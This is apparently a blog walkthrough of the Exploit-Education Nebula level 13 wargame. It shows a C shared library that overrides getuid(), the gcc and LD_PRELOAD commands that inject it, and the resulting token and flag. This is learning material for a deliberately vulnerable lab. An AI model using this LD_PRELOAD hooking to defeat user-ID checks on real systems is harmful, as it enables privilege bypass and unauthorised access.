---
layout: single_c
title:  "Exploit-Education Nebula Level 13"
date:   2019-08-19 10:43:16 +0530
categories: Exploit-Education
tags: Nebula
classes: wide
--- 
### [Exploit Education Level 13](https://exploit.education/nebula/level-13/)

## Challenge
There is a security check that prevents the program from continuing execution if the user invoking it does not match a specific user id.

To do this level, log in as the `level13` account with the password `level13`. Files for this level can be found in `/home/flag13`.

So it seems to be a simple program. A `getuid` function call is made and if the returned `uid` is 1000, the program
displays the token.
## Vulnerability
```cpp
if(getuid() != FAKEUID) {
```
We can abuse the `LD_PRELOAD` env variable to intercept the `getuid` function call.  
[Abusing LD_PRELOAD](https://www.sweharris.org/post/2017-03-05-ld-preload/)
>LD_PRELOAD lists shared libraries with functions that override the standard set, just as /etc/ld.so.preload does.
>These are implemented by the loader /lib/ld-linux.so. If you want to override just a few selected functions, 
>you can do this by creating an overriding object file and setting LD_PRELOAD; the functions in this object file will ?>override just those functions leaving others as they were.  

So basically we can override any function calls made by a program by creating our own shared library and loading it 
using the `LD_PRELOAD` env variable. So lets write a `c` program to override the `getuid` function and compile it as
a shared library.
## Solution
```cpp
level13@nebula:~$ cat gid.c
#include <sys/types.h>
uid_t getuid(void)
{
return 1000;
 }
```
Compile it as a shared library and set the `LD_PRELOAD` variable to point to our compiled file
```bash
gcc -o getuid.so -fPIC -shared gid.c -ldl
LD_PRELOAD=$PWD/getuid.so
```
There is one restriction. The shared library and the program loading it should have the same `uid` or it wont work. Since we have read permissions, lets just copy the file to the home directory and run it.
```bash
level13@nebula:/home/flag13$ cp flag13 /home/level13/flag13
level13@nebula:~$ ./flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
level13@nebula:~$ su -l flag13
Password:
flag13@nebula:~$ getflag
You have successfully executed getflag on a target account
```
### Solved!